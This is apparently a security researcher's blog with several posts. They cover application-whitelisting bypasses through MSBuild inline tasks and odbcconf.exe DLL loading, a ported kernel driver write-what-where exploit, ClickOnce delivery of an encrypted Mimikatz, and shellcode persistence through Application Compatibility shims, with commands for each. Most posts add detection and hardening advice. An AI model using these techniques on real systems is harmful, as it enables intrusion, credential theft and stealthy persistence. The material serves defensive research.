Monday, January 16, 2017

Attacking Drivers With MSBuild.exe

I’ve recently been experimenting with the full, offensive capabilities of MSBuild.exe. As a reference, MSBuild.exe ships with the .NET framework and comes installed by default on Windows 10.  


Starting in .NET Framework version 4, you can create tasks inline in the project file. You do not have to create a separate assembly to host the task. This makes it easier to keep track of source code and easier to deploy the task. The source code is integrated into the script.”


Specifically, the aspect of MSBuild.exe that we are leveraging is called an Inline Task.
This feature allows us to specify C# code in an XML file that gets compiled and executed in memory when called. The C# code that is included in the XML task, is compiled and loaded as a byte array in memory.  This gives us the huge advantage, since this will likely not be picked up by tools that monitor library loads from disk like Application Whitelisting or Anti Virus. Really, if you think about it, this is every bit as powerful as PowerShell, without all the logging and detection that comes with PowerShell these days.  By leveraging pure C# you can avoid the PowerShell Logging.
This idea led me to exploring the full potential of using MSBuild.exe for bypassing UMCI (User Mode Code Integrity). For example, to expand our influence on the local system, we could exploit a local, approved vulnerable driver. Normally, this process is kicked off by a user mode process to interact with the driver.  However… with UMCI in place, your PoC binary won’t execute and you are stuck… This blog will describe the details and methods that you can call to interact with the driver using the .NET framework, hosted inside MSBuild.exe.
If you would like to review the code sample. I’ve posted it here.
First a bit of background on the driver, and the exploit technique. I stumbled upon this driver on GitHub a couple weeks ago. All the research on this exploit was done by Shahriyar Jalayeri
( @ponez )
I wanted to see if I could port the exploit to C# so that I could use MSBuild.exe to execute it. And the answer is yes, yes you can ;-).
In this example, we are going to exploit a Write-What-Where vulnerability. This means that we can overwrite a location controlled by the Windows kernel.  The question is, how do we identify the “what” and the “where”? There is an excellent book here that provided a lot of the background for me.
A couple of preliminary steps:
First, we need to locate the base address of ntoskrnl.exe.  This can be done using the following routine here.  All of this can be done as a normal user.  As my colleague Matt Graeber (@mattifestation) pointed out, this is a fantastic heuristic for a sysmon rule. i.e. detection of any PID besides 4 (system process) that loads ntoskrnl.exe. There is no legitimate purpose for this. lt is almost certainly guaranteed to be malicious.


Second, once we have the base address of the kernel, we need to locate the offset to important structures and functions.  Here, we load ntoskrnl.exe into our process so that we can calculate offsets and calculate the values we need to overwrite.  


After discovering the correct base address of the Kernel Executive, we will be able to relocate whichever exported function we’d like to move by simply loading the same binary image in user land and relocating the relative virtual address (RVA) using the real kernel base address leaked by that function. Do not confuse RVAs with virtual memory addresses. An RVA is a virtual address of an object (a symbol) from the binary file after being loaded into memory, minus the actual base address of the file image in memory. To convert an RVA to the corresponding virtual address, we have to add the RVA to the corresponding module image base address. The procedure to relocate Kernel Executive functions, hence, is straightforward. We have to load the kernel image into user-mode address space via the LoadLibrary() API, and then pass the HMODULE handle to a function which resolves the RVA…” - Guide to Kernel Exploitation p276.


Ok.  Now we need to actually perform the overwrite. This is done by interacting with the driver and passing a malicious request that actually overwrites the locations we have found.


This is seen here.  


I ended up just writing a bunch of shellcode with NOP instructions, and 0xCC breaks.   I leave this up to you to experiment with to see what kind of interesting exploit you can come up with.  My code is a simple POC. Be sure to check out https://www.fuzzysecurity.com/ to see some cool exploits using PowerShell, much of this can be ported to .NET easily.


Ok.  So, what does this all mean?  Well, I’m an advocate of Application Whitelisting, and one of the reasons for exploring this area was to demonstrate that a valid signed driver can undermine your local systems.  The attacker can bring/install this driver and can use it to install rootkits or other malicious software running in the kernel context. The combination of a kernel mode and user mode bypass has significant implications.


Device Guard actually has a driver policy referred to as kernel mode code integrity (KMCI). This allows your organizations to approve drivers.  Even if the driver is signed, you can prevent this driver from being loaded on your systems. It is important to have a UMCI policy.  It is just as important to consider a KMCI policy as well.  Drivers should be far less dynamic in your environment.  You should know EXACTLY which drivers are deployed, and their versions.  A good reference on that is here and on Matt’s blog.


That’s all I have today.


Screen Shot 2017-01-13 at 1.17.53 PM.png


Casey
@subTee



Thursday, January 12, 2017

Consider Application Whitelisting with Device Guard

A while back, I posted this question on Twitter.


I realize that Twitter is a difficult medium to articulate full discussions, so I wanted to engage the topic with a blog post. Over the last couple years, I have focused a fair amount of time drawing attention to the use/misuse of trusted binaries to circumvent Application Whitelisting (AW) controls.  What I have not often discussed, is the actual effectiveness that I have seen of using AW. I would like to take the time to describe what I see are the strengths of AW, and encourage organizations to consider if it might work for their environments.
The genesis of this discussion came from my colleague, Matt Graeber (@mattifestation).  We’ve spent a fair amount of time looking at this technology as it applies to Microsoft’s Device Guard. And while we agree there are bypasses, we also believe that a tool like Device Guard can dramatically reduce the attack surface and tools available to an adversary.
One question you must ask yourself and your organization is this… How long will you allow the adversary to use EXE/DLL tradecraft to persist and operate in your environment? I have heard a great deal of discussion and resistance to deploying AW. However, I personally have not heard anyone who has deployed the technology say that they regret whitelisting.
When the organization I used to work for deployed AW in 2013, it freed up our team from several tasks.  It gave us time to hunt and prepare for the more sophisticated adversary.  There are many commodity attacks and targeted attacks that take various forms.  However, one commonality they all often share is to drop an EXE or DLL to disk and execute. It is this form of attack that you can mitigate with AW.  With whitelisting, you force the adversary to retool and find new tradecraft, because unapproved, unknown binaries will not execute…
How long will you continue to perform IR and hunt C2 that is emitted from an unapproved PE file?
Here are some of the common reasons I have heard for NOT implementing AW. There are probably others, but this summarizes many.


1.     Aren’t there trivial bypasses? It doesn’t stop all attacks.
2.     Too much effort.
3.     It doesn’t scale.
I’ll take each of these and express my opinion. I’m open to dialogue on this and if I’m wrong, I would like to hear it and correct course…
1.     Aren’t there trivial bypasses to AW?  It doesn’t stop all attacks.
There are indeed ways to bypass AW.  I have found a few.  However, most of the bypasses I have demonstrated require that you have already obtained access to, and have the ability to execute commands on the target system. How does the attacker gain that privilege in the first place if you deny them arbitrary PE’s?  Most likely it will be from a memory corruption exploit in the browser or other application.  How many exploit kits, macros, or tools lead to dropping a binary and executing it?  Many do…
Most of the bypasses I have used are rooted in misplaced trust.  Often administrators of AW follow a pattern of “Scan A Gold Image & Approve Everything There”.  As Matt Graeber has pointed out to me several times, this is not the best approach.  There are far too many binaries that are included by default that can be abused. A better approach here is to explicitly trust binaries or publishers of code.  I can’t think of a single bypass that I have discovered that can’t be mitigated by the whitelist itself.  For example, use the whitelist to block regsvr32.exe or InstallUtil.exe.
Don’t fall victim to the Perfect Solution Fallacy.  The fact that AW doesn’t stop all attacks, or the fact that there are bypasses, is no reason to dismiss this as a valid defense.


“Nobody made a greater mistake than he who did nothing because he could do only a little.” –Edmund Burke
AW, in my opinion, can help you get control of software executing in your environment. It actually gives teeth to those Software Installation Policies. For example, it only takes that one person trying to find the Putty ssh client, and downloading a version with a backdoor to cause problems in your network.  For an example of how to backdoor putty see this recent post. Or use The Backdoor Factory (BDF). The thing is, it doesn’t matter that putty has a backdoor.  The original file has been altered, and will not pass the approval process for the whitelist, and the file will be denied execution. Only the approved version of putty would be able to execute in your environment.
2.     Too much effort.
Well… I’ve heard this, or some variation of it.  I understand that deploying and maintaining AW takes tremendous effort if you want to be successful.  It actually will take training multiple people to know how to make approvals and help with new deployments.
You will actually have to work very closely with your client teams, those in IT that manage the endpoints.  These partnerships can only strengthen the security team’s ability to respond to incidents. You can leverage tools like SCCM to assist with AW approvals and deployments.
The level of effort decreases over time.  Yes, there will be long hours on the front end, deploying configurations, reviewing audit logs, updating configs, etc… Some admins are so worried they will block something inadvertently; they are paralyzed to even try.  I think you’ll find out, Yes, you will block something legitimate.  Accept that this will happen, it’s a learning process, take it in steps.  Use that as an opportunity to get better.
I’ll say it again; I haven’t met anyone who has made the effort to deploy AW say that they regret the decision…
If you think it’s too hard, why not try 10% of the organization and see what you learn?
Stop telling me you aren’t doing this because it’s too hard… Anything worth doing well is going to require some effort and determination.
3.     It doesn’t scale.
Nope, it may not in your environment.  I never said it would… You must decide how far to go.  You may not get AW everywhere, but you can still win with it deployed in critical locations.  The image below describes how I think about how AW applies to different parts of your organization.  It is not a one-size-fits-all solution.  There are approaches and patterns that affect how you will deploy and configure whitelists. I think you should start with the bottom, and work your way up the stack.
Start to think of your environment in terms of how dynamic the systems are.  At the low end of the are those fixed function systems.  Think about systems similar to Automated Teller Machines.  These often only need to be able to apply patches.  New software rarely ever lands here.  Next, you have various department templates, each department will be unique, but likely fits a pattern.  Then IT Admins, who often need to install software to test or have more dynamic requirements.  At the top of the environment, are Developer workstations.  These are systems that are emitting code and testing.  I’m not saying you can’t whitelist here.  You can, I’ve done it.  But it will require some changes to build processes, code signing etc…


Yes, this is an overly simplified analogy, but I hope it helps you see where you can begin to prioritize AW deployments.
So, begin to reorient how you think about your systems to how dynamic they are.  You will have your quickest wins and earliest wins by starting at the bottom and moving your way up the hierarchy.


Conclusion


I am curious for open debate here.  If AW sucks, then let me hear why.  Tell me what your experience has been.  What would have made it work?  I’m interested in solutions that make a long term actual difference in your environment.  It is my opinion that AW works, despite some flaws.  It can dramatically reduce the attack patterns used by an adversary and increase the noise they generate.  I also believe that by implementing AW, your security teams can gain efficiencies how they operate. I am open to learn here.
If you are tasked with defending your organization, I’m asking you, as you begin to roll out Windows 10, to consider using Device Guard.


Ok, that’s all I have today.  Sincere feedback welcome.  If you think I’m wrong, I’d like to hear why...

Cheers,

Casey
@subTee

Wednesday, December 14, 2016

Mimikatz Delivery via ClickOnce with URL Parameters

Recently during an ATD team Hackathon, we split our team into groups and attacked different problems. The challenge that @webyeti and I took on, was write a quick POC to prove the ability to pass URL parameters to a ClickOnce Application.

This has the advantage of customizing the implant at the time the user clicks to install the application. For background on ClickOnce as a phishing payload, see the following:


One of the challenges with ClickOnce is having to use Visual Studio to compile each payload for the target. By leveraging URL Parameters, you can build a base download cradle that contains custom logic based on the actual request that was made. This means you can easily customize payloads without having to recompile them.

The ability to pass input to the ClickOnce Deployment is well-documented here:

So let’s look at an example. In this example, we will download and execute an encrypted version of Mimikatz. This is just a basic example to highlight the capabilities of this tactic. Passing a key in the URL parameter is a bad idea, since a well-trained defender could extract the key from a proxy log or the registry. But I think this technique provides enough opportunity for unique key material per payload.

First, you will need to create the Visual Studio Application and configure the app to be Published as a ClickOnce Application.

Second, when you host the application on a web server, you will need to setup the correct MIME types to trigger the ClickOnce App.

Setting up the right MIME types is well-documented here:

.application –> application/x-ms-application 
.manifest –> application/x-ms-manifest 
.deploy –> application/octet-stream

The code to parse and process the URL Parameters is really simple.
Request:  http://www.example.com/s.application?field1=value1&field2=value2&field3=value3
Then your app can call:
string queryString = ApplicationDeployment.CurrentDeployment.ActivationUri.Query;
This will retrieve the Query string.

There are numerous examples of being able to customize your delivery based on inputs from the URL parameters.  I leave it to you to experiment with other ways to leverage this tactic.

Here is a brief Demo:




POC Gist:

From a Defensive perspective. There will be a number of artifacts stored in the registry.  
Each ClickOnce application leaves a tattoo in the registry of the settings including the initial URL requested.  HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall
With a per app dynamic key generated.

Screen Shot 2016-12-14 at 10.13.40 AM.png

Defenders should also consider blocking .application extension and the other MIME types mentioned above. Seriously...how often will apps be deployed from the outside of your network from arbitrary urls?


That’s all for today.  Hope this was helpful.

Screen Shot 2016-12-14 at 10.19.22 AM.png

Cheers,


Casey
@subTee


Thursday, October 27, 2016

Command Line Camouflage - ODBCCONF.EXE

One of the tools Blue Teams have is combining Big Data with Command Line Auditing.  So here's one to add some confusion to their game.

Recently I stumbled onto another interesting binary.  ODBCCONF.EXE Its default, in Windows, We've heard that before.

https://msdn.microsoft.com/en-us/library/ee388579(v=vs.85).aspx

If you look closely, there are two interesting switches.  /A and /F

So, we can load an arbitrary dll, no injection required this way.

odbcconf.exe /A { REGSVR evil.dll }

However, its much more interesting in my opinion to use

odbcconf.exe /F my.anyextension

For example: odbcconf.exe /F sqlserver.config

This will load the dll specified in the sqlserver.config file.

Recently Nick Tyrer  (@NickTyrer) created an interactive PowerShell console using this method.

Pretty fantastic!

https://gist.github.com/NickTyrer/6ef02ce3fd623483137b45f65017352b



This requires the C# code to be compiled with the Unmanaged-Export capability found here:

https://www.nuget.org/packages/UnmanagedExports

So check it out!

Sometimes all you need is some good camouflage.


Thats all for today.  Short and Sweet.


Cheers,

Casey
@subTee


Thursday, October 13, 2016

Using Application Compatibility Shims

Overview:
There have been number of blog posts and presentations on Application Compatibility Shims in the past [See References at End].  Application Compatibility is a framework to resolve issues with older applications; however, it has additional use cases that are interesting. For example, EMET is implemented using shims[1,2]. Please see the Reference section below for additional reading and resources.  In short, this document will focus on the following tactics: injecting shellcode via In-Memory patches and injecting a DLL into a 32bit process, and lastly, detection and shim artifacts will be discussed.  An In-Memory patch has this advantage over backdooring an executable: it this preserves the signature and integrity checks.  This technique can also bypass some Application Whitelisting deployments.  AppLocker, for example, would allow the startup of a trusted application, and then an In-Memory patch could be applied to alter the application.


Shim Installation:
The shim infrastructure is built into Windows PE loader. Shims can be applied to a process during startup. There is a two-step process that I will refer to as “Match and Patch”.  The Match process checks the registry on process create and looks for a relevant entry. If an entry is found, the Match process further checks the associated .sdb file for additional attributes, version number for example.  Based on my understanding, the sdb does need to be present on disk. I have not encountered any tactics to load an sdb file from memory or remotely. When the Shim Databases are installed they are registered in the registry at the following two locations:


HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\AppCompatFlags\Custom
HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\AppCompatFlags\InstalledSDB


These entries can be created manually, using sdb-explorer.exe, or using the built-in tool sdbinst.exe. If you use sdbinst.exe there will also be an entry created in the Add/Remove Programs section. In order to install a shim, you need local administrator privileges.


An example of a shim entry would look like this:




Once the shim has been installed, it will be triggered upon each execution of that application. Remember, there is further validation of the executable inside of the sdb file. For example, matching a specific version or binary pattern. I have not found a way to apply a shim when a DLL is loaded, or apply a shim to an already running process.  These registry keys plus the actual sdb file are the indicators for the Blue Team that a shim is present.  


Shim Creation and Detonation:
There are two tools we can use to create shims. First, the Microsoft provided Application Compatibility Toolkit (ACT).  Second, the tool created by Jon Erickson, sdb-explorer.exe.  ACT will allow us to inject a DLL into a 32-bit process, while sdb-explorer allows us to create an In-Memory binary patch to inject shellcode. The ACT has no ability to parse or create an In-Memory patch. This can only be done via sdb-explorer.


There is an excellent walk-through here on creating an InjectDLL Demo.


For the remainder of this document, we will focus on using sdb-explorer to create and install an In-Memory patch.


My testing seems to indicate this will not work on Windows 10.  This tactic will only work on Windows versions <= 8.1.  I could be wrong about this, so please share any insight if you have it.


There are two approaches you can take with sdb-explorer.  First, you can simply Replace or write arbitrary bytes to a region in memory. Second, you can match a block of bytes and overwrite. There are advantages and disadvantages to both approaches. It is worth noting that this method of persistence will be highly specialized to the environment you are operating in. For example, you will need to know specific offsets in the binary   




For this to work, we need an offset to write out shellcode to. I like to use CFF Explorer.


Here we are going to target the AddressOfEntryPoint. There are other approaches as well.  The drawback to this approach is the application doesn’t actually execute. In order to do that you would need to execute your patch and then return control to the application.  I leave that as an exercise for the reader.


Once we have the offset, we can use the syntax provided by sdb-explorer to write our shellcode into the process at load time.


If we break down the syntax, it is pretty easy to understand.


Line 7. 0x39741 matches the PE Checksum. This is in the PE Header.




Line 8. 0x3689 is the offset of our AddressOfEntryPoint.  What follows is just stock shellcode to execute calc.


Once our configuration file is created, we “compile” or create the sdb.
sdb-explorer.exe –C notepad.conf –o notepad.sdb.


Then install it:


sdb-explorer.exe –r notepad.sdb –a notepad.exe


You can also use:


sdbinst –p notepad.sdb.


In either case it requires local administrative rights to install a shim.


Notepad.exe is nice. But more likely shim targets would be explorer.exe, lsass.exe, dllhost.exe, svchost.exe. Things that give you long term persistence. Of course your shellcode would need to return control to the application, instead of just hijacking AddressOfEntryPoint.


Shim Detection:
There are two primary indicators that a shim is being used. First, the registry keys mentioned above.  Second, the presence of the .sdb file. The presence of the .sdb file is not necessarily bad, it would be wise to build a baseline to understand which shims your organization uses and which would be an indicator. There was a good example of detecting shim databases given here:  Hunting Memory, on slide 27.  Also, some shim registration activity can be recorded in the Microsoft-Windows-Application-Experience-Program-Telemetry.evtx.


Cheers,


Casey
@subTee


References: